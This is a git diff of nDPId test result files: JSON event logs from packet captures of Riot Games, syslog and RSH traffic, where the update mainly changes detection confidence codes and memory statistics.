+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654790643639,"flow_last_seen":1654790643680,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563941,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":1239,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655757069043} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655757069043,"flow_last_seen":1655757069043,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1655757069043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655757069043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1655757069043,"pkt":"eJS0JASgYDjgxTWgCABFAAAkrucAAH8RlrbAqAJkQhbxCO6rw1QAEGNsEzfK\/hYAAAA="} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655757069043,"flow_last_seen":1655757069043,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1655757069043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655757069107,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1655757069107,"pkt":"YDjgxTWgeJS0JASgCABFAAAkQStAADYRDXNCFvEIwKgCZMNU7qsAEGNsEzfK\/hYAAAAAAAAAAAAAAAAA"} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1655323563669,"flow_last_seen":1655323563941,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655757069107,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":1255,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1657052125163} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1657052125163,"flow_last_seen":1657052125163,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1657052125163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1657052125163,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1657052125163,"pkt":"eJS0JASgYDjgxTWgCABFAABRqHYAAH8R5R7AqAJkovlIAcCSHBoAPQSXzcb7QPwy+QMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1657052125163,"flow_last_seen":1657052125163,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1657052125163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1657052126157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1657052126157,"pkt":"eJS0JASgYDjgxTWgCABFAABRqHcAAH8R5R3AqAJkovlIAcCSHBoAPQSXzcb7QPwy+QMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1657052126464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1657052126464,"pkt":"YDjgxTWgeJS0JASgCABFAAA9paFAAPYRMQei+UgBwKgCZBwawJIAKXrw\/DL5AwEAAAC8FwL8OQwqd\/zywtfCXzxlgMLEt38OVBEK"} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1655757069043,"flow_last_seen":1655757069107,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1657052127590,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1657052125163,"flow_last_seen":1657052127590,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1657052127590,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} 
+00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-payload-len":2085,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1657052127590} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 44/44 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 2085 bytes +~~ total detected protocols..: 9 +~~ total active/idle flows...: 9/9 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6012833 bytes +~~ total memory freed........: 6012833 bytes +~~ total allocations/frees...: 120952/120952 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 452 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 570 chars diff --git a/test/results/rsh-syslog-false-positive.pcap.out b/test/results/rsh-syslog-false-positive.pcap.out index 5cc70fd92..6db589ef0 100644 --- a/test/results/rsh-syslog-false-positive.pcap.out +++ b/test/results/rsh-syslog-false-positive.pcap.out 
@@ -2,14 +2,14 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1464076252936} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":292,"pkt_l4_len":272,"thread_ts_msec":1464076252936,"pkt":"RQABJL4eQAA8Bq0urB9OgawdK8kjTwICdUbR1TedTUKAGABzPQsAAAEBCAoozL9YkELf7TwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0NTErMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNSQ0ggYmFzZT0ib3U9cGVvcGxlLGRjPWluLGRjPXBobSxkYz1lZHVjYXRpb24sZGM9Z291dixkYz1mciIgc2NvcGU9MiBkZXJlZj0wIGZpbHRlcj0iKCYodWlkPXRvb2xib3gpKG9iamVjdENsYXNzPXBvc2l4QWNjb3VudCkoJih1aWROdW1iZXI9KikoISh1aWROdW1iZXI9MCkpKSkiCg=="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
01524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1464076252948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":844,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":844,"pkt_l4_len":824,"thread_ts_msec":1464076252948,"pkt":"RQADTL4fQAA8BqsFrB9OgawdK8kjTwICdUbSxTedTUKAGABzuVAAAAEBCAoozL9lkELg+DwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0NzUrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNSQ0ggYXR0cj1vYmplY3RDbGFzcyB1aWQgdXNlclBhc3N3b3JkIHVpZE51bWJlciBnaWROdW1iZXIgZ2Vjb3MgaG9tZURpcmVjdG9yeSBsb2dpblNoZWxsIGtyYlByaW5jaXBhbE5hbWUgY24gbW9kaWZ5VGltZXN0YW1wIG1vZGlmeVRpbWVzdGFtcCBzaGFkb3dMYXN0Q2hhbmdlIHNoYWRvd01pbiBzaGFkb3dNYXggc2hhZG93V2FybmluZyBzaGFkb3dJbmFjdGl2ZSBzaGFkb3dFeHBpcmUgc2hhZG93RmxhZyBrcmJMYXN0UHdkQ2hhbmdlIGtyYlBhc3N3b3JkRXhwaXJhdGlvbiBwd2RBdHRyaWJ1dGUgYXV0aG9yaXplZFNlcnZpY2UgYWNjb3VudEV4cGlyZXMgdXNlckFjY291bnRDb250cm9sIG5zQWNjb3VudExvY2sgaG9zdCBsb2dpbkRpc2FibGVkIGxvZ2luRXhwaXJhdGlvblRpbWUgbG9naW5BbGxvd2VkVGltZU1hcAo8MTY3PjIwMTYtMDUtMjRUMDk6NTA6NTIuOTI2NDgxKzAyOjAwIGxkYXAwMSBzbGFwZFszNDUzNF06IGNvbm49MTE1OTAyMyBvcD00NCBFTlRSWSBkbj0idWlkPXRvb2xib3gsb3U9YWMtYWl4LW1hcnNlaWxsZSxvdT1pbnRlcm5lLG91PXBlb3BsZSxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiCjwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0ODYrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNFQVJDSCBSRVNVTFQgdGFnPTEwMSBlcnI9MCBuZW50cmllcz0xIHRleHQ9Cg=="} 
00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1464076252968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":303,"pkt_l4_len":283,"thread_ts_msec":1464076252968,"pkt":"RQABL74gQAA8Bq0hrB9OgawdK8kjTwICdUbV3TedTUKAGABzb+4AAAEBCAoozL94kELhBTwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45NTc4OTUrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ1IFNSQ0ggYmFzZT0ib3U9Z3JvdXBlcyxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiIHNjb3BlPTIgZGVyZWY9MCBmaWx0ZXI9IigmKG1lbWJlclVpZD10b29sYm94KShvYmplY3RDbGFzcz1wb3NpeEdyb3VwKShjbj0qKSgmKGdpZE51bWJlcj0qKSghKGdpZE51bWJlcj0wKSkpKSIK"} 00251{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":12,"packet_id":6,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","size":1010,"expected":1084,"global_ts_msec":1464076253006} 01637{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1010,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1010,"pkt_l4_len":0,"thread_ts_msec":1464076252992,"pkt":"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"} 00251{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":12,"packet_id":7,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","size":1010,"expected":1400,"global_ts_msec":1464076253008} 
01637{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1010,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1010,"pkt_l4_len":0,"thread_ts_msec":1464076253006,"pkt":"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"} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1464076252936,"flow_last_seen":1464076253018,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":958,"flow_tot_l4_payload_len":4939,"flow_avg_l4_payload_len":617,"midstream":1,"thread_ts_msec":1464076253018,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1464076252936,"flow_last_seen":1464076253018,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":958,"flow_tot_l4_payload_len":4939,"flow_avg_l4_payload_len":617,"midstream":1,"thread_ts_msec":1464076253018,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":4939,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1464076253018} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8/8 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869675 bytes -~~ total memory freed........: 5869675 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003309 bytes +~~ total memory freed........: 6003309 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 256 chars ~~ json string max len.......: 1642 chars diff --git a/test/results/rsh.pcap.out b/test/results/rsh.pcap.out index 326b05417..146400b39 100644 --- a/test/results/rsh.pcap.out +++ b/test/results/rsh.pcap.out 
@@ -4,14 +4,14 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA8BJ9AAEAGOBt\/AAABfwAAAQP\/AgJQUgi+AAAAAKAC\/9f+MAAAAgT\/1wQCCAp\/2NwKAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQICA\/+d65A3UFIIv6AS\/8v+MAAAAgT\/1wQCCAp\/2NwKf9jcCgEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA0BKBAAEAGOCJ\/AAABfwAAAQP\/AgJQUgi\/neuQOIAQAgD+KAAAAQEICn\/Y3Ap\/2NwK"} -00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277359673,"flow_last_seen":1654277359689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277359689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277359673,"flow_last_seen":1654277359689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277359689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654277362292,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1654277362292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA89+tAAEAGRM5\/AAABfwAAAQP9AgKmCPcIAAAAAKAC\/9f+MAAAAgT\/1wQCCAp\/2OZEAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQICA\/0MeFXipgj3CaAS\/8v+MAAAAgT\/1wQCCAp\/2OZEf9jmRAEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA09+xAAEAGRNV\/AAABfwAAAQP9AgKmCPcJDHhV44AQAgD+KAAAAQEICn\/Y5kR\/2OZE"} -00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277362292,"flow_last_seen":1654277362309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1654277362309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
